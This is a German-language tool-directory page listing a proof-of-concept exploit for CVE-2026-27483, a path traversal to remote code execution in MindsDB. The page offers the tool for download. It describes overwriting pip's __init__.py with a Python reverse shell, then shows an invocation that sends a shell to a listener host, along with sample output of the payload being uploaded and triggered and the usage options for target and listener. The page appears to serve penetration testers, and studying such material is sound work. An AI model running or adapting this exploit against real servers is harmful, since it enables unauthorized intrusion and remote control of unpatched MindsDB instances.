Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2026-27483 — MindsDB Path Traversal zu RCE PoC | Kitploit
Tools/GitHubGitHub/thewhiteh4t/cve-2026-27483
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubthewhiteh4t/cve-2026-27483

cve-2026-27483

MindsDB Path Traversal zu RCE PoC

Repository anzeigen
52vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-27483

MindsDB Path Traversal zu RCE PoC

Dieses PoC-Skript basiert auf dem folgenden GitHub-Advisory

  • Standardmäßig verwendet MindsDB keine Authentifizierung
  • Der PoC unterstützt sowohl unauthentifizierte als auch authentifizierte Modi
  • Wir können /api/handlers/ abfragen, um verfügbare Handler zu finden; verwende den Namen eines verfügbaren, aber nicht installierten Handlers
  • Der PoC überschreibt /venv/lib/python3.10/site-packages/pip/__init__.py
  • Eine Python-Reverse-Shell wird in den obigen Pfad geschrieben und dann ausgelöst
root@kitploit:~
python cve-2026-27483.py -lh 192.168.0.100 -lp 4444 -u admin -p password

-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------

[>] Found By : XlabAITeam
[>] PoC By   : Lohitya Pushkar (thewhiteh4t)

[>] Target   : http://127.0.0.1:47334
[>] LHOST    : 192.168.0.100
[>] LPORT    : 4444

[*] Checking status...

[*] MindsDB Version : 25.9.1.0
[+] Login successful!
[*] Uploading payload : qwvhotfj
[+] Payload uploaded!
[*] Triggering payload...
Tool herunterladen

Abhängigkeiten

root@kitploit:~
pip3 install requests packaging

Verwendung

root@kitploit:~
python cve-2026-27483.py -h
usage: cve-2026-27483.py [-h] [-rh RH] [-rp RP] [-lh LH] [-lp LP] [-u U] [-p P]

options:
  -h, --help  show this help message and exit
  -rh RH      Target host
  -rp RP      Target port
  -lh LH      Listener host
  -lp LP      Listener port
  -u U        Username
  -p P        Password